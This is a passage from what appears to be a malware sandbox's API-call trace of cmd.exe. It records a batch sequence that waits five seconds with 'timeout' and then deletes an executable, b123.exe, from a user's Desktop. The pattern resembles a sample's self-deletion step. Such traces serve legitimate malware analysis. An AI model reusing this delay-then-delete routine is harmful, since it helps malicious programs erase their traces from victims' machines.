Flags=0x8, Size=0x58) returned 0x6d8f88 [0262.432] _wcsicmp (_String1="del", _String2=")") returned 59 [0262.432] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0262.432] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0262.432] _wcsicmp (_String1="IF", _String2="del") returned 5 [0262.432] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0262.432] _wcsicmp (_String1="REM", _String2="del") returned 14 [0262.432] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0262.432] GetProcessHeap () returned 0x6d0000 [0262.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x58) returned 0x6d8fe8 [0262.432] GetProcessHeap () returned 0x6d0000 [0262.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x10) returned 0x6d4180 [0262.434] GetProcessHeap () returned 0x6d0000 [0262.434] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x6a) returned 0x6d9048 [0262.435] GetProcessHeap () returned 0x6d0000 [0262.435] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x58) returned 0x6d90c0 [0262.435] _wcsicmp (_String1="exit", _String2=")") returned 60 [0262.435] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0262.435] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0262.435] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0262.435] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0262.435] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0262.435] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0262.435] GetProcessHeap () returned 0x6d0000 [0262.435] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x58) returned 0x6d9120 [0262.435] GetProcessHeap () returned 0x6d0000 [0262.435] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x12) returned 0x6d7bc0 [0262.437] GetConsoleTitleW (in: lpConsoleTitle=0x19fa10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0262.438] _wcsicmp (_String1="timeout", _String2="DIR") returned 16 [0262.438] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15 [0262.438] _wcsicmp (_String1="timeout", _String2="DEL") returned 16 [0262.438] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16 [0262.438] _wcsicmp (_String1="timeout", _String2="COPY") returned 17 [0262.438] _wcsicmp (_String1="timeout", _String2="CD") returned 17 [0262.438] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17 [0262.438] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2 [0262.438] _wcsicmp (_String1="timeout", _String2="REN") returned 2 [0262.438] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15 [0262.438] _wcsicmp (_String1="timeout", _String2="SET") returned 1 [0262.438] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4 [0262.438] _wcsicmp (_String1="timeout", _String2="DATE") returned 16 [0262.438] _wcsicmp (_String1="timeout", _String2="TIME") returned 111 [0262.438] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4 [0262.438] _wcsicmp (_String1="timeout", _String2="MD") returned 7 [0262.438] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7 [0262.438] _wcsicmp (_String1="timeout", _String2="RD") returned 2 [0262.438] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2 [0262.438] _wcsicmp (_String1="timeout", _String2="PATH") returned 4 [0262.438] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13 [0262.438] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1 [0262.438] _wcsicmp (_String1="timeout", _String2="CLS") returned 17 [0262.438] _wcsicmp (_String1="timeout", _String2="CALL") returned 17 [0262.438] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2 [0262.439] _wcsicmp (_String1="timeout", _String2="VER") returned -2 [0262.439] _wcsicmp (_String1="timeout", _String2="VOL") returned -2 [0262.439] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15 [0262.439] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1 [0262.439] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15 [0262.439] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7 [0262.439] _wcsicmp (_String1="timeout", _String2="START") returned 1 [0262.439] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16 [0262.439] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9 [0262.439] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7 [0262.439] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4 [0262.439] _wcsicmp (_String1="timeout", _String2="POPD") returned 4 [0262.439] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19 [0262.439] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14 [0262.439] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18 [0262.439] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17 [0262.439] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7 [0262.439] _wcsicmp (_String1="timeout", _String2="DIR") returned 16 [0262.439] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15 [0262.439] _wcsicmp (_String1="timeout", _String2="DEL") returned 16 [0262.439] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16 [0262.439] _wcsicmp (_String1="timeout", _String2="COPY") returned 17 [0262.439] _wcsicmp (_String1="timeout", _String2="CD") returned 17 [0262.439] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17 [0262.439] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2 [0262.439] _wcsicmp (_String1="timeout", _String2="REN") returned 2 [0262.439] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15 [0262.439] _wcsicmp (_String1="timeout", _String2="SET") returned 1 [0262.440] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4 [0262.440] _wcsicmp (_String1="timeout", _String2="DATE") returned 16 [0262.440] _wcsicmp (_String1="timeout", _String2="TIME") returned 111 [0262.440] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4 [0262.440] _wcsicmp (_String1="timeout", _String2="MD") returned 7 [0262.440] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7 [0262.440] _wcsicmp (_String1="timeout", _String2="RD") returned 2 [0262.440] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2 [0262.440] _wcsicmp (_String1="timeout", _String2="PATH") returned 4 [0262.440] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13 [0262.440] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1 [0262.440] _wcsicmp (_String1="timeout", _String2="CLS") returned 17 [0262.440] _wcsicmp (_String1="timeout", _String2="CALL") returned 17 [0262.440] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2 [0262.440] _wcsicmp (_String1="timeout", _String2="VER") returned -2 [0262.440] _wcsicmp (_String1="timeout", _String2="VOL") returned -2 [0262.440] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15 [0262.440] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1 [0262.440] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15 [0262.440] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7 [0262.440] _wcsicmp (_String1="timeout", _String2="START") returned 1 [0262.440] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16 [0262.440] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9 [0262.440] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7 [0262.440] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4 [0262.440] _wcsicmp (_String1="timeout", _String2="POPD") returned 4 [0262.440] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19 [0262.440] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14 [0262.440] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18 [0262.441] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17 [0262.441] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7 [0262.441] _wcsicmp (_String1="timeout", _String2="FOR") returned 14 [0262.441] _wcsicmp (_String1="timeout", _String2="IF") returned 11 [0262.441] _wcsicmp (_String1="timeout", _String2="REM") returned 2 [0262.441] GetProcessHeap () returned 0x6d0000 [0262.441] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x210) returned 0x6d9180 [0262.441] GetProcessHeap () returned 0x6d0000 [0262.441] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x26) returned 0x6d9398 [0262.442] _wcsnicmp (_String1="time", _String2="cmd ", _MaxCount=0x4) returned 17 [0262.442] GetProcessHeap () returned 0x6d0000 [0262.442] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x418) returned 0x6d05c8 [0262.442] SetErrorMode (uMode=0x0) returned 0x0 [0262.442] SetErrorMode (uMode=0x1) returned 0x0 [0262.442] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6d05d0, lpFilePart=0x19f51c | out: lpBuffer="C:\\ProgramData", lpFilePart=0x19f51c*="ProgramData") returned 0xe [0262.442] SetErrorMode (uMode=0x0) returned 0x1 [0262.442] GetProcessHeap () returned 0x6d0000 [0262.442] RtlReAllocateHeap (Heap=0x6d0000, Flags=0x0, Ptr=0x6d05c8, Size=0x36) returned 0x6d05c8 [0262.442] GetProcessHeap () returned 0x6d0000 [0262.442] RtlSizeHeap (HeapHandle=0x6d0000, Flags=0x0, MemoryPointer=0x6d05c8) returned 0x36 [0262.442] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x11bf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0262.443] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0262.443] GetProcessHeap () returned 0x6d0000 [0262.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xf2) returned 0x6d93c8 [0262.443] GetProcessHeap () returned 0x6d0000 [0262.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1dc) returned 0x6d0608 [0262.452] GetProcessHeap () returned 0x6d0000 [0262.452] RtlReAllocateHeap (Heap=0x6d0000, Flags=0x0, Ptr=0x6d0608, Size=0xf4) returned 0x6d0608 [0262.452] GetProcessHeap () returned 0x6d0000 [0262.452] RtlSizeHeap (HeapHandle=0x6d0000, Flags=0x0, MemoryPointer=0x6d0608) returned 0xf4 [0262.452] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x11bf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0262.452] GetProcessHeap () returned 0x6d0000 [0262.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xe0) returned 0x6d0708 [0262.454] GetProcessHeap () returned 0x6d0000 [0262.454] RtlReAllocateHeap (Heap=0x6d0000, Flags=0x0, Ptr=0x6d0708, Size=0x76) returned 0x6d0708 [0262.454] GetProcessHeap () returned 0x6d0000 [0262.454] RtlSizeHeap (HeapHandle=0x6d0000, Flags=0x0, MemoryPointer=0x6d0708) returned 0x76 [0262.455] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0262.455] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\timeout.*", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0xffffffff [0262.456] GetLastError () returned 0x2 [0262.456] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0262.456] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.*", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0x6d94c8 [0262.456] GetProcessHeap () returned 0x6d0000 [0262.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6d7b00 [0262.456] FindClose (in: hFindFile=0x6d94c8 | out: hFindFile=0x6d94c8) returned 1 [0262.456] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.COM", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0xffffffff [0262.457] GetLastError () returned 0x2 [0262.457] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0x6d94c8 [0262.457] GetProcessHeap () returned 0x6d0000 [0262.457] RtlReAllocateHeap (Heap=0x6d0000, Flags=0x0, Ptr=0x6d7b00, Size=0x4) returned 0x6d4198 [0262.457] FindClose (in: hFindFile=0x6d94c8 | out: hFindFile=0x6d94c8) returned 1 [0262.457] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0262.457] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0262.457] GetConsoleTitleW (in: lpConsoleTitle=0x19f79c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0262.461] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f6c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f6ac | out: lpAttributeList=0x19f6c8, lpSize=0x19f6ac) returned 1 [0262.461] UpdateProcThreadAttribute (in: lpAttributeList=0x19f6c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f6b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f6c8, lpPreviousValue=0x0) returned 1 [0262.461] GetStartupInfoW (in: lpStartupInfo=0x19f700 | out: lpStartupInfo=0x19f700*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0262.461] GetProcessHeap () returned 0x6d0000 [0262.461] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x18) returned 0x6d7920 [0262.461] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0262.461] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0262.461] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0262.461] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.461] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.461] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.461] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0262.461] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0262.461] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0262.461] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0262.461] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0262.462] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0262.463] GetProcessHeap () returned 0x6d0000 [0262.463] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d7920) returned 1 [0262.463] GetProcessHeap () returned 0x6d0000 [0262.463] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xa) returned 0x6d94c8 [0262.463] lstrcmpW (lpString1="\\timeout.exe", lpString2="\\XCOPY.EXE") returned -1 [0262.466] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\timeout.exe", lpCommandLine="timeout /t 5 ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\ProgramData", lpStartupInfo=0x19f650*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="timeout /t 5 ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f69c | out: lpCommandLine="timeout /t 5 ", lpProcessInformation=0x19f69c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xeac, dwThreadId=0xfb0)) returned 1 [0262.690] CloseHandle (hObject=0xa4) returned 1 [0262.690] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0262.690] GetProcessHeap () returned 0x6d0000 [0262.690] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6dab80) returned 1 [0262.690] GetEnvironmentStringsW () returned 0x6da068* [0262.690] GetProcessHeap () returned 0x6d0000 [0262.690] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xb0a) returned 0x6dab80 [0262.690] FreeEnvironmentStringsA (penv="=") returned 1 [0262.690] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0268.320] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x19f634 | out: lpExitCode=0x19f634*=0x0) returned 1 [0268.321] CloseHandle (hObject=0xa8) returned 1 [0268.321] _vsnwprintf (in: _Buffer=0x19f71c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f63c | out: _Buffer="00000000") returned 8 [0268.321] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0268.322] GetProcessHeap () returned 0x6d0000 [0268.322] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6dab80) returned 1 [0268.322] GetEnvironmentStringsW () returned 0x6da068* [0268.322] GetProcessHeap () returned 0x6d0000 [0268.322] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xb30) returned 0x6dc1d0 [0268.322] FreeEnvironmentStringsA (penv="=") returned 1 [0268.322] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0268.323] GetProcessHeap () returned 0x6d0000 [0268.323] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6dc1d0) returned 1 [0268.323] GetEnvironmentStringsW () returned 0x6da068* [0268.323] GetProcessHeap () returned 0x6d0000 [0268.323] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xb30) returned 0x6dc1d0 [0268.323] FreeEnvironmentStringsA (penv="=") returned 1 [0268.323] GetProcessHeap () returned 0x6d0000 [0268.323] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d94c8) returned 1 [0268.323] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f6c8 | out: lpAttributeList=0x19f6c8) [0268.323] GetConsoleTitleW (in: lpConsoleTitle=0x19f9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0268.324] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0268.324] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0268.324] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0268.324] GetProcessHeap () returned 0x6d0000 [0268.324] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xcc) returned 0x6d08b8 [0268.325] GetProcessHeap () returned 0x6d0000 [0268.325] RtlReAllocateHeap (Heap=0x6d0000, Flags=0x0, Ptr=0x6d08b8, Size=0x6c) returned 0x6d08b8 [0268.325] GetProcessHeap () returned 0x6d0000 [0268.325] RtlSizeHeap (HeapHandle=0x6d0000, Flags=0x0, MemoryPointer=0x6d08b8) returned 0x6c [0268.325] GetProcessHeap () returned 0x6d0000 [0268.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x72) returned 0x6dab90 [0268.326] GetProcessHeap () returned 0x6d0000 [0268.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xcc) returned 0x6d0930 [0268.327] GetProcessHeap () returned 0x6d0000 [0268.327] RtlReAllocateHeap (Heap=0x6d0000, Flags=0x0, Ptr=0x6d0930, Size=0x6c) returned 0x6d0930 [0268.327] GetProcessHeap () returned 0x6d0000 [0268.327] RtlSizeHeap (HeapHandle=0x6d0000, Flags=0x0, MemoryPointer=0x6d0930) returned 0x6c [0268.327] GetProcessHeap () returned 0x6d0000 [0268.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x56) returned 0x6d94f8 [0268.327] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19f758 | out: lpBuffer="C:\\ProgramData") returned 0xe [0268.327] GetProcessHeap () returned 0x6d0000 [0268.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x38) returned 0x6d09a8 [0268.327] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19e7c8 | out: lpBuffer="C:\\ProgramData") returned 0xe [0268.327] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19e9fc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x19ea00, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19e9fc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0268.328] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0268.328] GetProcessHeap () returned 0x6d0000 [0268.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2c) returned 0x6d9558 [0268.328] GetProcessHeap () returned 0x6d0000 [0268.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x258) returned 0x6d0c28 [0268.328] _wcsicmp (_String1="b123.exe", _String2=".") returned 52 [0268.328] _wcsicmp (_String1="b123.exe", _String2="..") returned 52 [0268.328] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\b123.exe")) returned 0x20 [0268.329] GetProcessHeap () returned 0x6d0000 [0268.329] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x210) returned 0x6d0e88 [0268.329] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x6d0e90 | out: lpBuffer="C:\\ProgramData") returned 0xe [0268.329] SetErrorMode (uMode=0x0) returned 0x0 [0268.329] SetErrorMode (uMode=0x1) returned 0x0 [0268.329] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe", nBufferLength=0x104, lpBuffer=0x19ee28, lpFilePart=0x19edfc | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe", lpFilePart=0x19edfc*="b123.exe") returned 0x26 [0268.329] SetErrorMode (uMode=0x0) returned 0x1 [0268.329] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0268.329] GetProcessHeap () returned 0x6d0000 [0268.329] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x258) returned 0x6db070 [0268.329] _wcsicmp (_String1="b123.exe", _String2=".") returned 52 [0268.329] _wcsicmp (_String1="b123.exe", _String2="..") returned 52 [0268.330] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\b123.exe")) returned 0x20 [0268.330] GetProcessHeap () returned 0x6d0000 [0268.330] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1a) returned 0x6d09e8 [0268.330] GetProcessHeap () returned 0x6d0000 [0268.330] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x44) returned 0x6d0a10 [0268.330] GetProcessHeap () returned 0x6d0000 [0268.330] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x44) returned 0x6d0a60 [0268.330] GetProcessHeap () returned 0x6d0000 [0268.330] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x808) returned 0x6d81f8 [0268.330] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe", fInfoLevelId=0x0, lpFindFileData=0x6d8204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6d8204) returned 0x6d8a08 [0268.330] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0268.330] NtOpenFile (in: FileHandle=0x19ecfc, DesiredAccess=0x10000, ObjectAttributes=0x19ecc4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ecec, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x19ecfc*=0xa4, IoStatusBlock=0x19ecec*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0268.332] RtlReleaseRelativeName () returned 0x19ecdc [0268.332] RtlFreeAnsiString (AnsiString="\\") [0268.332] NtQueryVolumeInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x19ec28, FsInformation=0x19ec30, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x19ec28, FsInformation=0x19ec30) returned 0x0 [0268.332] CloseHandle (hObject=0xa4) returned 1 [0268.337] FindNextFileW (in: hFindFile=0x6d8a08, lpFindFileData=0x6d8204 | out: lpFindFileData=0x6d8204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528e2d80, ftCreationTime.dwHighDateTime=0x1d83e68, ftLastAccessTime.dwLowDateTime=0x528e2d80, ftLastAccessTime.dwHighDateTime=0x1d83e68, ftLastWriteTime.dwLowDateTime=0x4d77b100, ftLastWriteTime.dwHighDateTime=0x1d83e5d, nFileSizeHigh=0x0, nFileSizeLow=0x39758, dwReserved0=0x0, dwReserved1=0x0, 